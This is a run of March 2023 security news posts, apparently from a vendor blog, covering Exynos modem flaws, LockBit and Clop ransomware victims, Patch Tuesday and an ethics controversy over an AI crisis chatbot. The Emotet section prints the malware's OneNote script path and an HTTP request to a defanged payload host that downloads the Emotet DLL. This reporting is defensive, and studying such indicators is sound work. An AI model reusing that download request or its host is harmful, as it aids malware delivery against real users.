IT NEWS

Google’s Project Zero is warning of multiple significant vulnerabilities found across many models of mobile devices including Samsung Galaxy, Google Pixel, Vivo, and several forms of wearable and vehicles using certain types of components.

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Of those 18, a total of four vulnerabilities are tagged as “top-severity” which could allow for silent compromise over the network.

Which devices are affected?

The list of impacted technology is as follows:

• Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series
• Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series
• The Pixel 6 and Pixel 7 series of devices from Google
• Any vehicles that use the Exynos Auto T5123 chipset

The four most severe vulnerabilities could allow attackers to remotely compromise a device, with no physical interaction required at any stage of the proceedings. The only thing an attacker requires for the compromise to take place is knowledge of the intended victim’s phone number.

The other fourteen, while still bad, are nowhere near as severe, and for them to be successful requires either a malicious mobile network operator or an attacker with local access to the device.

Meanwhile, the Google Security research team believes that the most severe vulnerabilities would allow skilled attackers to create an operational exploit in a short space of time.

Patching and scope of threat

While Google mentions that patching will be dependent on manufacturer, PIxel phones (for example) have already been patched against CVE-2023-24033 in the March security update. If a patch isn’t forthcoming for your own device yet, Google has some suggestions to help keep your technology safe from harm. If your device allows you to, switch off two settings called:

• Wi-Fi calling
• Voice-over-LTE (VoLTE)

This will prevent the risk of exploitation. One potential ramification of disabling VoLTE is that in recent years it has become something of a necessity for some mobile networks. If you’re able to turn it off, then based on the information available you may experience poor call quality and lack of certain features and functionality. On the other hand, VoLTE is “not available everywhere on every network, or on every handset” so it may not matter too much anyway depending on your make and model.

As for scope, depending on where your device is from you may not be running the vulnerable type of chip needed for the exploit to be successful. The Verge notes that phones sold outside of Europe and some African countries” use something else altogether. In those instances, you should be fine.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The LockBit ransomware group is claiming responsibility for taking down a US-based distributor of office products called Essendant. This attack, which is said to have begun on or around March 6, created severe ramifications for the organisation, disrupting freight carrier pickups, online orders, and access to customer support.

As noted by Bleeping Computer, the original notification that something had gone wrong made no mention of ransomware or even any form of compromise. There’s still no mention on the updated notification page. However, this may be about to change in the wake of LockBit’s claims.

As with so many ransomware groups out there, LockBit is a fan of using stolen data to apply additional pressure and make victims pay the ransom. In cases where the payment is not made, the data is put up for sale, or simply posted online for free. This is a big leveraging factor on many businesses when deciding what to do about ransom threats.

On March 14, LockBit added Essendant to its leaks page with the threat of supposedly stolen data being published by March 18, if its demands are not met.

The description of the embattled organisation comes with the message “Change a recovery company and try again”. This could be a reference to previous failed attempts to decrypt the compromised data.

LockBit has demonstrated time and again that it will release stolen data if the target refuses to pay. Just last month, Royal Mail found itself on the wrong end of a data dump via the LockBit leak portal after a high profile ransomware attack caused all manner of postal delays.

Unusually, the Royal Mail data dump also came with a chat log of the entire conversation between LockBit and Royal Mail. The log is absolutely fascinating and illustrates the need for victims to employ someone who knows what they’re doing when negotiating with attackers.

LockBit is arguably the most dangerous malware in the world right now. It was by far the most dominant ransomware in 2022, and hasn’t slowed down in 2023, which is why it’s one of the five threats you can’t afford to ignore in our in our 2023 State of Malware report.

Its success comes from its professionalism. LockBit is run as a business: It has a slick website, it avoids the political grandstanding of its competitors, and even offers bug bounties to people who find flaws in its software. It distributes three different versions of its ransomware-as-a-service (RaaS), which are reportedly used by 100 affiliates, and its largest known ransom demand is $80 million.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Rubrik, a cybersecurity company specializing in cloud data management, has revealed that some of its systems were infiltrated by the Clop ransomware group. Rubrik is one of many companies attacked by Clop via an infamous zero-day vulnerability in the GoAnywhere file transfer software.

The attack began in February, according to its CEO Michael Mestrovich. “We detected unauthorized access to a limited amount of information in one of our non-production IT testing environments as a result of the GoAnywhere vulnerability,” he says in a blog post published Tuesday. Mestrovich claims that “based on our current investigation, being conducted with the assistance of third-party forensics experts, the unauthorized access did NOT include any data we secure on behalf of our customers via any Rubrik products.”

He also revealed the attackers compromised internal sales data, including customer and partner company names, business contact information, and some purchase orders from Rubrik distributors. According to Mestrovich, the third-party investigators used by Rubrik confirmed that no personal information, such as Social Security Numbers (SSNs), financial accounts, and payment card numbers, were compromised.

The GoAnywhere vulnerability, tracked as CVE-2023-0669, has a severity rating of High and was included in CISA’s Known Exploited Vulnerabilities Catalog, a list of actively exploited vulnerabilities every federal information system must patch urgently. The catalog is an essential go-to list for IT admins trying to prioritize their patching.

The attack on Rubrik happened before an emergency patch was available.

Clop hasn’t been shy about the 130 organizations it’s stolen data from thanks to the GoAnywhere vulnerability. Last week, the gang began sending out extortion emails to the victims, and adding them to its leak site. Known victims include Rubrik, Hatch Bank and Community Health Systems (CHS).

Organizations using GoAnywhere should download the security patch immediately. Fortra has also provided a technical mitigation in its advisory, which can be accessed via the company’s customer portal.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%OneNote16.0NTclick.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%OneNote16.0NTrad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

In what is likely Vice Society’s handiwork, the UK’s largest state boarding school Wymondham College has announced it has become the victim of a “sophisticated cyberattack”. The school didn’t provide additional information, but Jonathan Taylor, chief of the school’s parent company Sapientia Education Trust, has revealed the school is yet to receive a ransom note.

In an email to The Record, Taylor said:

“We are not aware of any data breach. A number of the College’s systems have been impacted, including access to some files and resources.” 

Taylor said the school remains open, saying the priority is “to ensure continuity of educational provision”. The Norwich Evening News reports disruption will likely continue until the Easter holidays as the attack targeted the College’s IT system.

Wymondham College is working with the National Cyber Security Centre (NCSC), the UK’s authority for cyber incidents, to ensure an appropriate response. Taylor says the Department of Education has also been notified.

The NCSC has warned the UK education sector about increasing targeted ransomware attacks toward schools, colleges, and universities. However, latest research from the London Grid for Learning (LGfL) reveals that only 53 percent of UK schools feel prepared for a cyberattack. 

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ukrainian game developer GSC Game World has announced it was breached by Russian hacktivists who stole assets related to the much-awaited game STALKER 2: Heart of Chernobyl. 

A message from GSC Game World team pic.twitter.com/rqRM0tFZmO

— S.T.A.L.K.E.R. OFFICIAL (@stalker_thegame) March 12, 2023

According to GSC, the hacktivists accessed an employee’s image app account and stole STALKER 2’s full story, cut scenes, various concept art, global maps, and more. The company said these assets are being used for blackmail and intimidation.

“We have been enduring constant cyberattacks for more than a year now,” the GCS Game World Team said in its.

“We have faced blackmail, acts of aggression, attempts to hurt players and fans, and efforts to damage the development process of the reputation of our company.”

A group named Vestnik TSS has claimed responsibility and has given the devs an ultimatum: Do as we say, or we’ll leak all stolen STALKER 2 assets.

“Nick Frost”, a Vestnik TSS administrator, posted the group’s demands on the Russian social media site VK.com. Below is a screenshot of the English-translated post:

Vestnik TSS wants GSC to apologize to players in Russia and Belarus for its perceived “unworthy attitude” towards them, un-ban certain Russian accounts on its official Discord server, and bring back the Russian localization of STALKER 2. The group gave the developers until March 15, Wednesday, to make these changes.

It appears, however, that Vestnik TSS leaked some files that they stole before yesterday’s deadline. The group’s VK page is awash with concept art, which includes an overview of mutant NPCs, bits of the game world’s map, and artifacts. On Tuesday, alias “Daniel Nexus”, likely another admin, posted more STALKER 2 assets archived and kept behind a password.

GSC Game World is yet to respond to the demands; and by the tone of its message, I suspect the developers have no intention of complying. Instead, the team has pleaded for the STALKER community to refrain from watching or distributing the leaked materials.

“Outdated and work-in-progress materials may dilute the impression of the final idea that we have put into the game. We encourage you to stay patient and wait for the official release for the best experience possible. We believe that you will love it.”

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) ruled that a complaint that Meta’s tracking pixels by the privacy organization noyb were conflicting with European GDPR rules was partially upheld. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA in a data transfer without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European based website owners. Because of the transferred responsibility the website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Microsoft, and other vendors, have released their monthly updates. In total Microsoft has fixed a total of 101 vulnerabilities for several titles (including Edge), with two of them being actively exploited zero-days. On top of that, Adobe has fixed an actively exploited vulnerability in ColdFusion.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs of the actively exploited vulnerabilities patched in these updates are:

CVE-2023-23397: a critical Microsoft Outlook Elevation of Privilege (EoP) vulnerability. External attackers could send specially crafted emails to cause a connection from the victim to an external UNC location of attackers’ control. This would leak the Net-NTLMv2 hash of the victim to the attacker who could then relay this to another service and authenticate as the victim. The mail would be triggered automatically when retrieved and processed by the Outlook client, which could result in exploitation even before the email is viewed in the Preview Pane.

This means this vulnerability could be used to obtain a hashed token, which could then be used in a so-called “pass-the-hash” attack.  Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then returns the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client’s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that mathematical operation required to gain access. The authentication process does not require the plaintext password. The hash is enough.

CVE-2023-24880: a moderate Windows SmartScreen Security Feature Bypass vulnerability. An attacker could craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. Reportedly, this vulnerability was used in ransomware related attacks.

MOTW, the technology that ensures Windows pops a warning message when trying to open a file downloaded from the Internet makes another comeback. The MOTW is an attribute added to files by Windows when they have been sourced from an untrusted location, like the internet or a Restricted Zone. When you download a file from the internet, Windows adds the zone identifier or Mark of the Web as an NTFS stream to the file. And, when you run the file, Windows SmartScreen checks if there is a zone identifier Alternate Data Stream (ADS) attached to the file. If the ADS indicates ZoneId=3, which means that the file was downloaded from the internet, the SmartScreen does a reputation check.

CVE-2023-26360: classified as a priority 1 vulnerability in Adobe ColdFusion due to critical deserialization of untrusted data. This flaw can lead to arbitrary code execution, making it a high-priority target for attackers.

Adobe says it is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe recommends updating your ColdFusion versions 2021 and 2018 JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

• ColdFusion 2018 Auto-Lockdown guide
• ColdFusion 2021 Lockdown Guide

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

• Adobe has released security updates to address vulnerabilities in other products. Commerce APSB23-17, Experience Manager APSB23-18, Illustrator APSB23-19, Dimension APSB23-20, Creative Cloud Desktop Application APSB23-21, Substance 3D Stager APSB23-22, and Photoshop APSB23-23.

• Fortinet published its March 2023 security advisories which address a high-severity security vulnerability (CVE-2022-41328) in FortiOS, that allowed threat actors to execute unauthorized code or commands.

• SAP has released security updates for 19 vulnerabilities, five of which were rated as critical.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

After getting in hot water for using an AI chatbot to provide mental health counseling, non-profit startup Koko has now been criticized for experimenting with young adults at risk of harming themselves. Worse, the young adults were unaware they were test subjects. 

Motherboard reports the experiment took place between August and September 2022. At-risk subjects, aged 18 to 25, were directed to a chatbot after posting “crisis-related” keywords like “depression” and “sewer-slide” on Discord, Facebook Messenger, Telegram, and Tumblr. They were then randomly assigned to a group that received a “typical crisis response” (call the crisis hotline), or a “one-minute, enhanced crisis response Single-Session Intervention (SSI)” powered by AI.

Rob Morris, Koko co-founder and Stony Brook University professor, carried out the experiment with his psychology peers, Katherine Cohen, Mallory Dobias, and Jessica Schleider. The study says it aims to show social media platforms that pointing young adults to crisis hotlines isn’t enough. Morris says he wants to show that an AI chatbot intervention is more effective in supporting young adults struggling with mental health issues.

However, this appears to only look good on paper.

Before Koko performs what it was designed to do, it first presents its privacy policy and terms of service (ToS), telling users their anonymous data may be shared and used for research. Here lies the first problem: Consent to take part in the project is given by agreeing to Koko’s privacy policy and ToS. As we all know, a great majority of people online normally don’t read these. Presumably, it’s not the first thought for at-risk young adults either.

When asked about provisions for true consent, Morris tells Motherboard, “There are many situations in which the IRB would exempt researchers from obtaining consent for very good reasons because it could be unethical, or impractical, and this is especially common for internet research. It’s nuanced.” An IRB, or institutional review board, is also called a research ethics committee. Essentially, they’re the group protecting human research subjects.

The second problem involves data. The preprint reveals that subjects provided their age, gender identity, and sexual identity to the researchers. Such datasets may be anonymous, but studies show these can still be traced back to specific individuals with a high accuracy of 99.98 percent. “Most IRBs give a pass to ‘de-identified’ research as they claim there can be no privacy or security harms. But, in this case, they are collecting demographic information which could be used to identify users,” said Eric Perakslis, the chief science and digital officer at the Duke Clinical Research Institute, Motherboard reports.

And the last problem, which alarmed and appalled researchers and psychologists alike, was that the experiment was carried out as “nonhuman subjects research.” This means subjects have been stripped of due safety- and privacy-related protections.

“Completely, horribly unethical. Mucking around in an experimental manner with unproven interventions on potentially suicidal persons is just awful,” New York University bioethics professor Arthur Caplan was quoted as saying.

“If this is the way entrepreneurs think they can establish AI for mental diseases and conditions, they had best plan for a launch filled with backlash, lawsuits, condemnation and criticism. All of which are entirely earned and deserved.”

“I have not in recent years seen a study so callously asleep at the ethical wheel. Dealing with suicidal persons in this way is inexcusable,” he added.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

According to information gathered by BleepingComputer, the Clop ransomware group has claimed responsibility for the ransomware attacks that are tied to a vulnerability in the Fortra GoAnywhere MFT secure file-sharing solution.

As we reported on February 8, Fortra released an emergency patch (7.1.2) for an actively exploited zero-day vulnerability found in the GoAnywhere MFT administrator console.

GoAnywhere MFT, which stands for managed file transfer, allows businesses to manage and exchange files in a secure and compliant way. According to its website, it caters to more than 3,000 organizations, predominantly ones with over 10,000 employees and 1B USD in revenue.

Some of these organizations are considered vital infrastructure such as local governments, financial companies, healthcare organizations, energy firms, and technology manufacturers.

The day after the release of the GoAnywhere patch, the Clop ransomware gang contacted BleepingComputer and said they had used the flaw over ten days to steal data from 130 companies. At the time it was impossible to confirm this claim, but after two earlier victims, Community Health Systems (CHS) and Hatch Bank disclosed that data was stolen in the GoAnywhere MFT attacks, the Clop leak site now shows seven new companies. At least two of them reportedly have been breached using the GoAnywhere MFT vulnerability.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE of the exploited vulnerability is CVE-2023-0669, and described as a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.

It is unknown whether these victims were targeted during the time that there was no patch available for the vulnerability or later. Recent scans showed that around 1,000 administrative consoles are publicly exposed to the internet. The Web Client interface, which is the one that is normally accessible from the public internet, is not susceptible to this exploit, only the administrative interface.

Mitigation

If your GoAnywhere MFT administration portal is exposed to the Internet, you are under urgent advice to download the security patch from the Product Downloads tab at the top of the GoAnywhere account page which you will see after logging in.

If for some reason you can’t install the patch, Fortra says you should follow the mitigation steps it put out, which involves implementing some access control wherein the administrator console interface should only be accessed from trusted sources, or disabling the licensing service altogether. There is also a technical mitigation configuration shared in the advisory that is only visible after logging in (which can be done with a free account if you are interested).

On the file system where GoAnywhere MFT is installed, edit the file [install_dir]/adminroot/WEB_INF/web.xml

 Find and remove (delete or comment out) the following servlet and servlet-mapping configuration in the screenshot below.

 Before:

 <servlet>

      <servlet-name>License Response Servlet</servlet-name>

      <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>

      <load-on-startup>0</load-on-startup>

 </servlet>

 <servlet-mapping>

      <servlet-name>Licenses Response Servlet</servlet-name>

      <url-pattern>/lic/accept/</url-pattern>

 

After:

 <!–

 Add these tags to comment out the following section (as shown) or simply delete this section if you are not familiar with XML comments

 <servlet>

      <servlet-name>License Response Servlet</servlet-name>

      <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>

      <load-on-startup>0</load-on-startup>

 </servlet>

 <servlet-mapping>

      <servlet-name>Licenses Response Servlet</servlet-name>

      <url-pattern>/lic/accept/</url-pattern>

 </servlet-mapping>

  –>

 

Restart the GoAnywhere MFT application

If GoAnywhere MFT is clustered, this change needs to happen on every instance node in the cluster.

If you have questions, our support team is here to help.  Please contact Support via the portal https://my.goanywhere.com/, email goanywhere.support@helpsystems.com, or phone 402-944-4242 for assistance. “

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW